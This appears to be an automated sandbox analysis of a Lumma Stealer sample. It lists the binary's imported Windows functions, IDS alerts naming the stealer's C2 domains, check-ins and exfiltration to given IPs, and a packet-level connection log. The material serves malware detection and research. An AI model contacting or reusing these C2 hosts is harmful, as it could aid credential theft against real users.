USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:25.140782+0100 | 2059051 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) | 1 | 192.168.2.5 | 57712 | 1.1.1.1 | 53 | UDP |
2025-01-10T11:16:25.150626+0100 | 2059041 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) | 1 | 192.168.2.5 | 58510 | 1.1.1.1 | 53 | UDP |
2025-01-10T11:16:25.238549+0100 | 2059035 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) | 1 | 192.168.2.5 | 52244 | 1.1.1.1 | 53 | UDP |
2025-01-10T11:16:25.248968+0100 | 2059039 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) | 1 | 192.168.2.5 | 64838 | 1.1.1.1 | 53 | UDP |
2025-01-10T11:16:25.260066+0100 | 2059057 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) | 1 | 192.168.2.5 | 53648 | 1.1.1.1 | 53 | UDP |
2025-01-10T11:16:25.270926+0100 | 2059037 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) | 1 | 192.168.2.5 | 52928 | 1.1.1.1 | 53 | UDP |
2025-01-10T11:16:25.282334+0100 | 2059043 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) | 1 | 192.168.2.5 | 54789 | 1.1.1.1 | 53 | UDP |
2025-01-10T11:16:25.293212+0100 | 2059049 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) | 1 | 192.168.2.5 | 56194 | 1.1.1.1 | 53 | UDP |
2025-01-10T11:16:25.959763+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49716 | 104.102.49.254 | 443 | TCP |
2025-01-10T11:16:26.473215+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49716 | 104.102.49.254 | 443 | TCP |
2025-01-10T11:16:27.062353+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:27.522209+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:27.522209+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:28.020397+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49735 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:28.498428+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49735 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:28.498428+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49735 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:29.137473+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49741 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:30.323006+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49752 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:31.714083+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49763 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:32.933220+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49769 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:33.383735+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49769 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:33.895581+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49778 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:34.935320+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49786 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:35.444353+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49786 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:36.300749+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49792 | 185.161.251.21 | 443 | TCP |
2025-01-10T11:16:37.449554+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49803 | 104.21.15.122 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 10, 2025 11:16:25.316749096 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:25.316781998 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:25.316854000 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:25.318100929 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:25.318116903 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:25.959666967 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:25.959763050 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:25.962879896 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:25.962891102 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:25.963300943 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.008389950 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.011692047 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.055321932 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.473202944 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.473234892 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.473282099 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.473283052 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.473319054 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.473346949 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.473361015 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.473371029 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.473371029 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.473371029 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.473388910 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.473407030 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.565828085 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.565844059 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.565901995 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.565911055 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.566050053 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.570887089 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.570940971 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.570946932 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.570956945 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.570990086 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.572695971 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.572700977 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.572710037 CET | 49716 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 11:16:26.572712898 CET | 443 | 49716 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 11:16:26.589910030 CET | 49727 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:26.589920044 CET | 443 | 49727 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:26.590141058 CET | 49727 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:26.590379953 CET | 49727 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:26.590390921 CET | 443 | 49727 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:27.062262058 CET | 443 | 49727 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:27.062352896 CET | 49727 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:27.063772917 CET | 49727 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:27.063782930 CET | 443 | 49727 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:27.064176083 CET | 443 | 49727 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:27.065819025 CET | 49727 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:27.065835953 CET | 49727 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:27.065897942 CET | 443 | 49727 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:27.522206068 CET | 443 | 49727 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:27.522301912 CET | 443 | 49727 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:27.522363901 CET | 49727 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:27.523161888 CET | 49727 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:27.523175001 CET | 443 | 49727 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:27.523188114 CET | 49727 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:27.523194075 CET | 443 | 49727 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:27.527534008 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:27.527559996 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:27.527659893 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:27.528068066 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:27.528078079 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.018485069 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.020396948 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.020396948 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.020406008 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.020719051 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.030504942 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.030524969 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.030580044 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.498380899 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.498511076 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.498584032 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.498594999 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.498684883 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.498752117 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.498758078 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.498850107 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.498934984 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.498981953 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.498987913 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.499037027 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.499041080 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.502821922 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.502876043 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.502882004 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.503000975 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.503046989 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.503051043 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.555239916 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.555253029 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.590455055 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.590527058 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.590533018 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.590610981 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.590728045 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.590733051 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.590826988 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.590858936 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.590873003 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.590890884 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.590895891 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.590909004 CET | 49735 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.590913057 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.672727108 CET | 49741 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.672805071 CET | 443 | 49741 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:28.672894955 CET | 49741 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.673221111 CET | 49741 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:28.673243046 CET | 443 | 49741 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:29.137387991 CET | 443 | 49741 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:29.137473106 CET | 49741 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:29.138668060 CET | 49741 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:29.138722897 CET | 443 | 49741 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:29.139643908 CET | 443 | 49741 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:29.140889883 CET | 49741 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:29.141033888 CET | 49741 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:29.141105890 CET | 443 | 49741 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:29.825136900 CET | 443 | 49741 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:29.825381994 CET | 443 | 49741 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:29.825483084 CET | 49741 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:29.825625896 CET | 49741 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:29.825653076 CET | 443 | 49741 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:29.860892057 CET | 49752 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:29.860917091 CET | 443 | 49752 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:29.861049891 CET | 49752 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:29.861330986 CET | 49752 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:29.861347914 CET | 443 | 49752 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:30.322699070 CET | 443 | 49752 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:30.323005915 CET | 49752 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:30.323738098 CET | 49752 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:30.323748112 CET | 443 | 49752 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:30.324266911 CET | 443 | 49752 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:30.325285912 CET | 49752 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:30.325406075 CET | 49752 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:30.325443029 CET | 443 | 49752 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:30.325495005 CET | 49752 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:30.367321014 CET | 443 | 49752 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:31.198610067 CET | 443 | 49752 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:31.198853970 CET | 443 | 49752 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:31.198910952 CET | 49752 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:31.199062109 CET | 49752 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:31.199074984 CET | 443 | 49752 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:31.250061035 CET | 49763 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:31.250102997 CET | 443 | 49763 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:31.250231981 CET | 49763 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:31.250485897 CET | 49763 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:31.250516891 CET | 443 | 49763 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:31.713983059 CET | 443 | 49763 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:31.714082956 CET | 49763 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:31.715044975 CET | 49763 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:31.715065002 CET | 443 | 49763 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:31.715584040 CET | 443 | 49763 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:31.716521025 CET | 49763 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:31.716648102 CET | 49763 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:31.716690063 CET | 443 | 49763 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:31.716775894 CET | 49763 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:31.716792107 CET | 443 | 49763 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:32.341876030 CET | 443 | 49763 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:32.342130899 CET | 443 | 49763 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:32.342283010 CET | 49763 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:32.342356920 CET | 49763 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:32.342389107 CET | 443 | 49763 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:32.455444098 CET | 49769 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:32.455483913 CET | 443 | 49769 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:32.455558062 CET | 49769 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:32.455959082 CET | 49769 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:32.455971956 CET | 443 | 49769 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:32.933089018 CET | 443 | 49769 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:32.933219910 CET | 49769 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:32.937967062 CET | 49769 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:32.937977076 CET | 443 | 49769 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:32.938496113 CET | 443 | 49769 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:32.939615011 CET | 49769 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:32.939728975 CET | 49769 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:32.939733028 CET | 443 | 49769 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:33.383610964 CET | 443 | 49769 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:33.383810043 CET | 443 | 49769 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:33.383858919 CET | 49769 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:33.383923054 CET | 49769 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:33.383939028 CET | 443 | 49769 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:33.434802055 CET | 49778 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:33.434813976 CET | 443 | 49778 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:33.434866905 CET | 49778 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:33.435148954 CET | 49778 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:33.435163021 CET | 443 | 49778 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:33.895328045 CET | 443 | 49778 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:33.895581007 CET | 49778 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:33.922710896 CET | 49778 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:33.922732115 CET | 443 | 49778 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:33.923701048 CET | 443 | 49778 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:33.924671888 CET | 49778 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:33.924743891 CET | 49778 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:33.924750090 CET | 443 | 49778 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:34.456178904 CET | 443 | 49778 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:34.456425905 CET | 443 | 49778 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:34.456486940 CET | 49778 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:34.456619978 CET | 49778 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:34.456638098 CET | 443 | 49778 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:34.458735943 CET | 49786 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:34.458812952 CET | 443 | 49786 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:34.458890915 CET | 49786 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:34.459237099 CET | 49786 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:34.459271908 CET | 443 | 49786 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:34.935242891 CET | 443 | 49786 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:34.935319901 CET | 49786 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:34.936281919 CET | 49786 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:34.936299086 CET | 443 | 49786 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:34.936542034 CET | 443 | 49786 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:34.937553883 CET | 49786 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:34.937598944 CET | 49786 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:34.937623024 CET | 443 | 49786 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:35.444152117 CET | 443 | 49786 | 104.21.80.1 | 192.168.2.5 |
